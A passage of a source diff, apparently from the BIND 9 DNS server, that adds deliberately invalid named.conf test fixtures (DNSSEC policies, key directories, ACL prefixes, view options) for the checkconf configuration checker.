\ No newline at end of file diff --git a/bin/tests/system/checkconf/bad-inline-view.conf b/bin/tests/system/checkconf/bad-inline-view.conf new file mode 100644 index 0000000..e46bd0b --- /dev/null +++ b/bin/tests/system/checkconf/bad-inline-view.conf @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * inline-signing not allowed at view level. + */ +view "a" { + inline-signing yes; + + zone "." { + type primary; + file "root.db.signed"; + }; +}; + +view "b" { + zone "." { + type primary; + file "root.db"; + }; +}; diff --git a/bin/tests/system/checkconf/bad-interface-interval.conf b/bin/tests/system/checkconf/bad-interface-interval.conf new file mode 100644 index 0000000..ba8341a --- /dev/null +++ b/bin/tests/system/checkconf/bad-interface-interval.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + interface-interval 1x; +}; diff --git a/bin/tests/system/checkconf/bad-ipv4-prefix-dotted1.conf b/bin/tests/system/checkconf/bad-ipv4-prefix-dotted1.conf new file mode 100644 index 0000000..d7604eb --- /dev/null +++ b/bin/tests/system/checkconf/bad-ipv4-prefix-dotted1.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl myacl { + 127.1; /* Incomplete dotted IPv4 address / prefix */ +}; diff --git a/bin/tests/system/checkconf/bad-ipv4-prefix-dotted2.conf b/bin/tests/system/checkconf/bad-ipv4-prefix-dotted2.conf new file mode 100644 index 0000000..cb53741 --- /dev/null +++ b/bin/tests/system/checkconf/bad-ipv4-prefix-dotted2.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl myacl { + 127.1/8; /* No-zero bits */ +}; diff --git a/bin/tests/system/checkconf/bad-ipv4-prefix2.conf b/bin/tests/system/checkconf/bad-ipv4-prefix2.conf new file mode 100644 index 0000000..98e724a --- /dev/null +++ b/bin/tests/system/checkconf/bad-ipv4-prefix2.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl myacl { + 127; /* Non-dotted quad IPv4 address (0.0.0.127) / prefix without length. */ +}; diff --git a/bin/tests/system/checkconf/bad-kasp-define-default.conf b/bin/tests/system/checkconf/bad-kasp-define-default.conf new file mode 100644 index 0000000..569b1a8 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp-define-default.conf @@ -0,0 +1,23 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// 'default' is a built-in policy, redefinition not allowed. +dnssec-policy "default" { + signatures-refresh P5D; +}; + +zone "example.net" { + type master; + file "example.db"; + dnssec-policy "default"; +}; diff --git a/bin/tests/system/checkconf/bad-kasp-define-insecure.conf b/bin/tests/system/checkconf/bad-kasp-define-insecure.conf new file mode 100644 index 0000000..060dde7 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp-define-insecure.conf @@ -0,0 +1,23 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// 'insecure' is a built-in policy, redefinition not allowed. +dnssec-policy "insecure" { + signatures-refresh P5D; +}; + +zone "example.net" { + type master; + file "example.db"; + dnssec-policy "insecure"; +}; diff --git a/bin/tests/system/checkconf/bad-kasp-define-none.conf b/bin/tests/system/checkconf/bad-kasp-define-none.conf new file mode 100644 index 0000000..2bdff02 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp-define-none.conf @@ -0,0 +1,23 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// 'none' is a built-in policy, redefinition not allowed. +dnssec-policy "none" { + signatures-refresh P5D; +}; + +zone "example.net" { + type master; + file "example.db"; + dnssec-policy "none"; +}; diff --git a/bin/tests/system/checkconf/bad-kasp-duplicate.conf b/bin/tests/system/checkconf/bad-kasp-duplicate.conf new file mode 100644 index 0000000..7f3ade6 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp-duplicate.conf @@ -0,0 +1,15 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy a { }; +dnssec-policy a { }; diff --git a/bin/tests/system/checkconf/bad-kasp-key1.conf b/bin/tests/system/checkconf/bad-kasp-key1.conf new file mode 100644 index 0000000..b6bda15 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp-key1.conf @@ -0,0 +1,24 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy "badalg" { + keys { + csk lifetime unlimited algorithm ceasarscipher; + }; +}; + +zone "example.net" { + type master; + file "example.db"; + dnssec-policy "badalg"; +}; diff --git a/bin/tests/system/checkconf/bad-kasp-key2.conf b/bin/tests/system/checkconf/bad-kasp-key2.conf new file mode 100644 index 0000000..7e6a60e --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp-key2.conf @@ -0,0 +1,24 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy "badalg" { + keys { + csk lifetime unlimited algorithm 8 4097; + }; +}; + +zone "example.net" { + type master; + file "example.db"; + dnssec-policy "badalg"; +}; diff --git a/bin/tests/system/checkconf/bad-kasp-key3.conf b/bin/tests/system/checkconf/bad-kasp-key3.conf new file mode 100644 index 0000000..92806ff --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp-key3.conf @@ -0,0 +1,24 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy "badalg" { + keys { + csk lifetime unlimited algorithm rsasha512 1023; + }; +}; + +zone "example.net" { + type master; + file "example.db"; + dnssec-policy "badalg"; +}; diff --git a/bin/tests/system/checkconf/bad-kasp-key4.conf b/bin/tests/system/checkconf/bad-kasp-key4.conf new file mode 100644 index 0000000..c8e9ae6 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp-key4.conf @@ -0,0 +1,24 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy "badalg" { + keys { + csk lifetime unlimited algorithm 5 511; + }; +}; + +zone "example.net" { + type master; + file "example.db"; + dnssec-policy "badalg"; +}; diff --git a/bin/tests/system/checkconf/bad-kasp-keydir1.conf.in b/bin/tests/system/checkconf/bad-kasp-keydir1.conf.in new file mode 100644 index 0000000..b0deaea --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp-keydir1.conf.in @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * The same zone in different views is using different DNSSEC policies, so it + * may not have the same key-directory. + */ + + +key "keyforview1" { + algorithm @DEFAULT_HMAC@; + secret "YPfMoAk6h+3iN8MDRQC004iSNHY="; +}; + +key "keyforview2" { + algorithm @DEFAULT_HMAC@; + secret "4xILSZQnuO1UKubXHkYUsvBRPu8="; +}; + +view "example1" { + match-clients { key "keyforview1"; }; + + zone "example.net" { + type primary; + dnssec-policy "default"; + key-directory "."; + file "example1.db"; + }; +}; + +view "example2" { + match-clients { key "keyforview2"; }; + + zone "example.net" { + type primary; + dnssec-policy "insecure"; + key-directory "."; + file "example2.db"; + }; +}; diff --git a/bin/tests/system/checkconf/bad-kasp-keydir2.conf.in b/bin/tests/system/checkconf/bad-kasp-keydir2.conf.in new file mode 100644 index 0000000..699c193 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp-keydir2.conf.in @@ -0,0 +1,48 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * No key-directory is set, so the default is used. + * Should fail because the same zone in different views is using different + * DNSSEC policies. + */ + +key "keyforview1" { + algorithm @DEFAULT_HMAC@; + secret "YPfMoAk6h+3iN8MDRQC004iSNHY="; +}; + +key "keyforview2" { + algorithm @DEFAULT_HMAC@; + secret "4xILSZQnuO1UKubXHkYUsvBRPu8="; +}; + +view "example1" { + match-clients { key "keyforview1"; }; + + zone "example.net" { + type primary; + dnssec-policy "default"; + file "example1.db"; + }; +}; + +view "example2" { + match-clients { key "keyforview2"; }; + + zone "example.net" { + type primary; + dnssec-policy "insecure"; + file "example2.db"; + }; +}; diff --git a/bin/tests/system/checkconf/bad-kasp-keydir3.conf.in b/bin/tests/system/checkconf/bad-kasp-keydir3.conf.in new file mode 100644 index 0000000..0dbd7e2 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp-keydir3.conf.in @@ -0,0 +1,55 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * The zone in view "example1" inherits the key directory value from "options", + * but in view "example2" sets the key directory to the same value. This should + * be detected as an error because the zone is using different DNSSEC policies + * and should thus use different key directories. + */ + +key "keyforview1" { + algorithm @DEFAULT_HMAC@; + secret "YPfMoAk6h+3iN8MDRQC004iSNHY="; +}; + +key "keyforview2" { + algorithm @DEFAULT_HMAC@; + secret "4xILSZQnuO1UKubXHkYUsvBRPu8="; +}; + +options { + key-directory "keys"; +}; + +view "example1" { + match-clients { key "keyforview1"; }; + + zone "example.net" { + type primary; + /* key-directory inherited from options. */ + dnssec-policy "default"; + file "example1.db"; + }; +}; + +view "example2" { + match-clients { key "keyforview2"; }; + + zone "example.net" { + type primary; + dnssec-policy "insecure"; + key-directory "keys"; + file "example2.db"; + }; +}; diff --git a/bin/tests/system/checkconf/bad-kasp-keydir4.conf.in b/bin/tests/system/checkconf/bad-kasp-keydir4.conf.in new file mode 100644 index 0000000..af4a8f9 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp-keydir4.conf.in @@ -0,0 +1,52 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * The zone inherits the key-directory from the "view" level. Both views use the + * same key-directory, but the zone uses a different DNSSEC policy per view. + * This is a configuration error. + */ + +key "keyforview1" { + algorithm @DEFAULT_HMAC@; + secret "YPfMoAk6h+3iN8MDRQC004iSNHY="; +}; + +key "keyforview2" { + algorithm @DEFAULT_HMAC@; + secret "4xILSZQnuO1UKubXHkYUsvBRPu8="; +}; + +view "example1" { + match-clients { key "keyforview1"; }; + + key-directory "keys"; + + zone "example.net" { + type primary; + dnssec-policy "default"; + file "example1.db"; + }; +}; + +view "example2" { + match-clients { key "keyforview2"; }; + + key-directory "keys"; + + zone "example.net" { + type primary; + dnssec-policy "insecure"; + file "example2.db"; + }; +}; diff --git a/bin/tests/system/checkconf/bad-kasp-keydir5.conf.in b/bin/tests/system/checkconf/bad-kasp-keydir5.conf.in new file mode 100644 index 0000000..1cca608 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp-keydir5.conf.in @@ -0,0 +1,52 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * In one view, the zone inherits the key-directory from the "view" level, while + * in the other it is set explicitly at the "zone" level. In both cases, the + * same key-directory is used, but the zone uses a different DNSSEC policy per + * view. This is a configuration error. + */ + +key "keyforview1" { + algorithm @DEFAULT_HMAC@; + secret "YPfMoAk6h+3iN8MDRQC004iSNHY="; +}; + +key "keyforview2" { + algorithm @DEFAULT_HMAC@; + secret "4xILSZQnuO1UKubXHkYUsvBRPu8="; +}; + +view "example1" { + match-clients { key "keyforview1"; }; + + key-directory "keys"; + + zone "example.net" { + type primary; + dnssec-policy "default"; + file "example1.db"; + }; +}; + +view "example2" { + match-clients { key "keyforview2"; }; + + zone "example.net" { + type primary; + dnssec-policy "insecure"; + key-directory "keys"; + file "example2.db"; + }; +}; diff --git a/bin/tests/system/checkconf/bad-kasp-policy-undefined-inherited-view.conf b/bin/tests/system/checkconf/bad-kasp-policy-undefined-inherited-view.conf new file mode 100644 index 0000000..12a26d3 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp-policy-undefined-inherited-view.conf @@ -0,0 +1,25 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * The dnssec-policy is not defined. Should also be caught if it is inherited. + */ + +view "test" { + dnssec-policy "notdefined"; + + zone "example.net" { + type primary; + file "example.db"; + }; +}; diff --git a/bin/tests/system/checkconf/bad-kasp-policy-undefined-inherited.conf b/bin/tests/system/checkconf/bad-kasp-policy-undefined-inherited.conf new file mode 100644 index 0000000..48514ac --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp-policy-undefined-inherited.conf @@ -0,0 +1,25 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * The dnssec-policy is not defined. Should also be caught if it is inherited. + */ + +options { + dnssec-policy "notdefined"; +}; + +zone "example.net" { + type primary; + file "example.db"; +}; diff --git a/bin/tests/system/checkconf/bad-kasp10.conf b/bin/tests/system/checkconf/bad-kasp10.conf new file mode 100644 index 0000000..3088fc9 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp10.conf @@ -0,0 +1,28 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// One zone with dnssec-policy 'none', one zone with dnssec-policy 'insecure', +// both using the same zone file. + +zone "example1.net" { + type master; + file "example.db"; + dnssec-policy "none"; +}; + +zone "example2.net" { + type master; + file "example.db"; + dnssec-policy "insecure"; +}; + diff --git a/bin/tests/system/checkconf/bad-kasp11.conf b/bin/tests/system/checkconf/bad-kasp11.conf new file mode 100644 index 0000000..7c0b0e9 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp11.conf @@ -0,0 +1,28 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// One zone with a dnssec-policy, the other with allow-update, +// with the same zone file. + +zone "example1.net" { + type master; + file "example.db"; + dnssec-policy "default"; +}; + +zone "example2.net" { + type master; + file "example.db"; + allow-update { any; }; +}; + diff --git a/bin/tests/system/checkconf/bad-kasp12.conf b/bin/tests/system/checkconf/bad-kasp12.conf new file mode 100644 index 0000000..67b8c85 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp12.conf @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// One zone with a dnssec-policy, the other with update-policy, +// with the same zone file. + +zone "example1.net" { + type master; + file "example.db"; + dnssec-policy "default"; +}; + +zone "example2.net" { + type master; + file "example.db"; + update-policy { + grant * self * TXT; + }; +}; + diff --git a/bin/tests/system/checkconf/bad-kasp13.conf b/bin/tests/system/checkconf/bad-kasp13.conf new file mode 100644 index 0000000..e9078dd --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp13.conf @@ -0,0 +1,28 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// One zone transitioning to insecure, the other with allow-update, +// with the same zone file. + +zone "example1.net" { + type master; + file "example.db"; + dnssec-policy "insecure"; +}; + +zone "example2.net" { + type master; + file "example.db"; + allow-update { any; }; +}; + diff --git a/bin/tests/system/checkconf/bad-kasp2.conf b/bin/tests/system/checkconf/bad-kasp2.conf new file mode 100644 index 0000000..7f27906 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp2.conf @@ -0,0 +1,24 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "good-kasp.conf"; + +// Bad zone configuration because this has dnssec-policy and other DNSSEC sign +// configuration options (auto-dnssec). +zone "example.net" { + type master; + file "example.db"; + dnssec-policy "test"; + auto-dnssec maintain; + allow-update { any; }; +}; diff --git a/bin/tests/system/checkconf/bad-kasp3.conf b/bin/tests/system/checkconf/bad-kasp3.conf new file mode 100644 index 0000000..9e0c4b9 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp3.conf @@ -0,0 +1,24 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "good-kasp.conf"; + +// Bad zone configuration because this has dnssec-policy with no matching +// dnssec-policy configuration (good-kasp.conf has "test", zone refers to +// "nosuchpolicy". +zone "example.net" { + type master; + file "example.db"; + dnssec-policy "nosuchpolicy"; +}; + diff --git a/bin/tests/system/checkconf/bad-kasp4.conf b/bin/tests/system/checkconf/bad-kasp4.conf new file mode 100644 index 0000000..b5aa470 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp4.conf @@ -0,0 +1,25 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// Bad kasp configuration because this has an invalid duration for +// signatures-refresh. +dnssec-policy "badduration" { + signatures-refresh PT20Sabcd; +}; + +zone "example.net" { + type master; + file "example.db"; + dnssec-policy "badduration"; +}; + diff --git a/bin/tests/system/checkconf/bad-kasp6.conf b/bin/tests/system/checkconf/bad-kasp6.conf new file mode 100644 index 0000000..b05130c --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp6.conf @@ -0,0 +1,27 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// Two zones with dnssec-policy with the same zone file. + +zone "example1.net" { + type master; + file "example.db"; + dnssec-policy "default"; +}; + +zone "example2.net" { + type master; + file "example.db"; + dnssec-policy "default"; +}; + diff --git a/bin/tests/system/checkconf/bad-kasp7.conf b/bin/tests/system/checkconf/bad-kasp7.conf new file mode 100644 index 0000000..05734a5 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp7.conf @@ -0,0 +1,28 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// Two zones with dnssec-policy 'insecure' (transitioning to insecure) +// with the same zone file. + +zone "example1.net" { + type master; + file "example.db"; + dnssec-policy "insecure"; +}; + +zone "example2.net" { + type master; + file "example.db"; + dnssec-policy "insecure"; +}; + diff --git a/bin/tests/system/checkconf/bad-kasp8.conf b/bin/tests/system/checkconf/bad-kasp8.conf new file mode 100644 index 0000000..fa27a40 --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp8.conf @@ -0,0 +1,28 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// One zone with dnssec-policy, the other zone has 'dnssec-policy none', +// both with the same zone file. + +zone "example1.net" { + type master; + file "example.db"; + dnssec-policy "default"; +}; + +zone "example2.net" { + type master; + file "example.db"; + dnssec-policy "none"; +}; + diff --git a/bin/tests/system/checkconf/bad-kasp9.conf b/bin/tests/system/checkconf/bad-kasp9.conf new file mode 100644 index 0000000..a76436b --- /dev/null +++ b/bin/tests/system/checkconf/bad-kasp9.conf @@ -0,0 +1,28 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// One zone with dnssec-policy, the other zone has 'dnssec-policy insecure' +// (transitioning to inseure), both with the same zone file. + +zone "example1.net" { + type master; + file "example.db"; + dnssec-policy "default"; +}; + +zone "example2.net" { + type master; + file "example.db"; + dnssec-policy "insecure"; +}; + diff --git a/bin/tests/system/checkconf/bad-keep-response-order.conf b/bin/tests/system/checkconf/bad-keep-response-order.conf new file mode 100644 index 0000000..a3685d7 --- /dev/null +++ b/bin/tests/system/checkconf/bad-keep-response-order.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + keep-response-order { + does_not_exist; + }; +}; diff --git a/bin/tests/system/checkconf/bad-ksk-without-zsk.conf b/bin/tests/system/checkconf/bad-ksk-without-zsk.conf new file mode 100644 index 0000000..66e1b7f --- /dev/null +++ b/bin/tests/system/checkconf/bad-ksk-without-zsk.conf @@ -0,0 +1,24 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy ksk-without-zsk { + keys { + ksk lifetime 30d algorithm 13; + }; +}; + +zone "example" { + type primary; + file "example.db"; + dnssec-policy ksk-without-zsk; +}; diff --git a/bin/tests/system/checkconf/bad-lifetime.conf b/bin/tests/system/checkconf/bad-lifetime.conf new file mode 100644 index 0000000..f268076 --- /dev/null +++ b/bin/tests/system/checkconf/bad-lifetime.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + nta-lifetime 8d; +}; diff --git a/bin/tests/system/checkconf/bad-lmdb-mapsize-bogus.conf b/bin/tests/system/checkconf/bad-lmdb-mapsize-bogus.conf new file mode 100644 index 0000000..5655a16 --- 